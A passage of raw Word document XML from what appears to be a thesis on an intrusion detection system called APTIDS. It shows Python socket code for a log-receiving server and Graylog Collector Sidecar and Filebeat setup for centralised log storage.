        <w:t>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pPr>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2" w:rsidP="00B81AF2">
      <w:r>
        <w:t>Server then finds an available port and sends back to APTIDS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="00B81AF2"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81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">sock2.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>uport = sock2.getsockname()[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>sock2.close()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">csock.send(str(uport) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81AF2">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Server creates new thread for binding and listening on that port, and use computer name and windows version for writing log to file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DataChannel(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E4FF"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, computerName, windowsVersion):</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.bind((host, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4E4FF"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    sock.listen(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5</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while </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        (csock, caddr) = sock.accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        data = csock.recv(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)[:-</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2</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print </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile = open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"{0}.{1}"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.format(computerName, windowsVersion) + </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>".log"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"ab"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile.write(</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[{0}_{1}] "</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.format(computerName, windowsVersion) + data+</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A23CE">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        logFile.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRP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p>
    <w:p w:rsidR="00B81AF2" w:rsidRDefault="003A23CE" w:rsidP="00B81AF2">
      <w:r>
        <w:t>As we discussed before, Server will store log with the filename format as “Computer Name”.“Windows Version”.logs .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A23CE" w:rsidRDefault="003A23CE" w:rsidP="003A23CE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C00E3F" w:rsidRDefault="00C00E3F" w:rsidP="00C00E3F">
      <w:r>
        <w:t>In DLCH, we implemented Graylog Collector Sidecar for collecting log and sending to Graylog Server.</w:t>
      </w:r>
      <w:r w:rsidR="00067ED0">
        <w:t xml:space="preserve"> Graylog Collector Sidecar is configured to communicate with Graylog Server at Rest API (port 9000). In this thesis, we use Filebeat as the working backend for working with Graylog Server.</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve"> The configuration file is stored in </w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D" w:rsidRPr="00C92C7D">
        <w:t>/etc/graylog/collector-sidecar/collector_sidecar.yml</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve"> which contains the following options.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server_url: http://</w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&lt;Graylog-server-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00067ED0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>:9000/api/</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update_interval: 10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tls_skip_verify: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send_status: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list_log_files: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node_id: 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collector_id: file:/etc/graylog/collector-sidecar/collector-id</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cache_path: /var/cache/graylog/collector-sidecar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log_path: /var/log/graylog/collector-sidecar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log_rotation_time: 86400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log_max_age: 604800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tags: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apt_1</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backends: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/etc/graylog/collector-sidecar/generated/nxlog.conf</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filebeat</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      enabled: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/usr/bin/filebeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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/etc/graylog/collector-sidecar/generated/filebeat.yml</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p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="0047170D" w:rsidP="0047170D">
      <w:r>
        <w:t xml:space="preserve">Graylog Collector Sidecar </w:t>
      </w:r>
      <w:r w:rsidR="00C92C7D">
        <w:t xml:space="preserve">defines </w:t>
      </w:r>
      <w:r>
        <w:t>some essential information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047170D" w:rsidRDefault="0047170D" w:rsidP="0047170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">server_url: </w:t>
      </w:r>
      <w:r w:rsidR="00CF1493">
        <w:t>The URL path Graylog Collector Sidecar uses to communicate with Graylog Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1493" w:rsidRDefault="00CF1493" w:rsidP="0047170D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tags: The tags name of this current log stream. Each log stream can </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067ED0" w:rsidRDefault="00D907E1" w:rsidP="00D907E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>backends: Working backends used for communicating with Graylog Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00C92C7D" w:rsidP="00C92C7D">
      <w:r>
        <w:t>Graylog Collector Sidecar does not specify any file or directory for collecting log, it will receive the configuration for file and folder input when connects to the Graylog server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D907E1" w:rsidRPr="00BA1B83" w:rsidRDefault="00D907E1" w:rsidP="00D907E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F73B87" w:rsidRDefault="00F73B87">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EA71C0" w:rsidRDefault="00C92C7D" w:rsidP="00EA71C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc485239611"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00C92C7D" w:rsidP="00C92C7D">
      <w:r>
        <w:t>We implement Graylog Server as CLSS for storing log sent from DLCH. Graylog virtual machine image can be downloaded from the official site. After installing Graylog image, we configure it to work with Graylog Collector Sidecar in DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92C7D" w:rsidRDefault="00F73B87" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To receive incoming log data from DLCH, we create a log input which use Beats as the </w:t>
      </w:r>
      <w:r w:rsidR="00280207">
        <w:t>framework. We set the binding address to local, which is 0.0.0.0 and port to 5044.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444219C5" wp14:editId="216C8CF8">
            <wp:extent cx="5581650" cy="46812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468122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rsidR="00280207" w:rsidRPr="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc485239548"/>
      <w:r w:rsidRPr="00280207">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w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00280207">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create an input for Graylog server using Beats framework.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00280207" w:rsidP="00280207">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This input creates a channel for Graylog to receive log data from DLCH via Filebeats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4742" w:rsidRDefault="00280207" w:rsidP="00BF4742">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="399F09EC" wp14:editId="799D7BFB">
            <wp:extent cx="5581650" cy="2794635"/>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79463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80207" w:rsidRPr="00BF4742" w:rsidRDefault="00BF4742" w:rsidP="00BF4742">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc485239549"/>
      <w:r w:rsidRPr="00BF4742">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2</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Graylog</w:t>
      </w:r>
      <w:r w:rsidR="00FA24D9">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4742">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel for receiving data from DLCH via Filebeats</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="00280207" w:rsidRDefault="00E53574" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>To display the log in dashboard, Graylog server has to be configured an output channel which used the input described above. For</w:t>
      </w:r>
      <w:r w:rsidR="00200338">
        <w:t xml:space="preserve"> each collector connect to Graylog server, we have to indicate 2 channels for its functionalities: an input channel and an output channel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3377E2F0" wp14:editId="1C0B6BDD">
            <wp:extent cx="5581650" cy="32099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32099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E53574" w:rsidRPr="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc485239550"/>
      <w:r w:rsidRPr="00200338">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3</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure input and output channel for each</w:t>
      </w:r>
      <w:r w:rsidR="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLCH’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00200338">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Configure the Input Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00200338">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190ACB05" wp14:editId="1430A9D7">
            <wp:extent cx="5553075" cy="75914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3075" cy="75914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Pr="00AF7236" w:rsidRDefault="00200338" w:rsidP="00AF7236">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc485239551"/>
      <w:r w:rsidRPr="00AF7236">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4</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AF7236" w:rsidRPr="00AF7236">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Input channel for DLCH’s collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00200338" w:rsidRDefault="00200338" w:rsidP="00F73B87">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Configure the Output Channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRDefault="00200338" w:rsidP="00A94909">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA7A322" wp14:editId="732A188E">
            <wp:extent cx="5581650" cy="3117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311785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Default="00A94909" w:rsidP="00A94909">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc485239552"/>
      <w:r w:rsidRPr="00A94909">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5</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A94909">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Output channel for DLCH’s collector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00A94909" w:rsidP="00A94909">
      <w:r>
        <w:t xml:space="preserve">We create an Output channel for each DLCH’s collector, then we create the Input channel which forwards log data to the output channel. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94909" w:rsidRDefault="00A94909" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The log path for collecting is set to “/home/hungio/APTLogs/*.log” which indicates that Graylog Collector Sidecar will read into the directory name “APTLogs” and read all the file with the extension is “.log”. “APTLogs” is also the directory where DLCH stores the log files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C425FC" w:rsidRDefault="00C425FC" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The update interval is set to 5 seconds which indicates Graylog Collector to read the files every 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00C425FC" w:rsidP="00C425FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The encoding format is set to “utf-8” indicating that the log files to be read use utf-8 format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A" w:rsidP="00326F1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc485239612"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APTIDS Testing</w:t>
      </w:r>
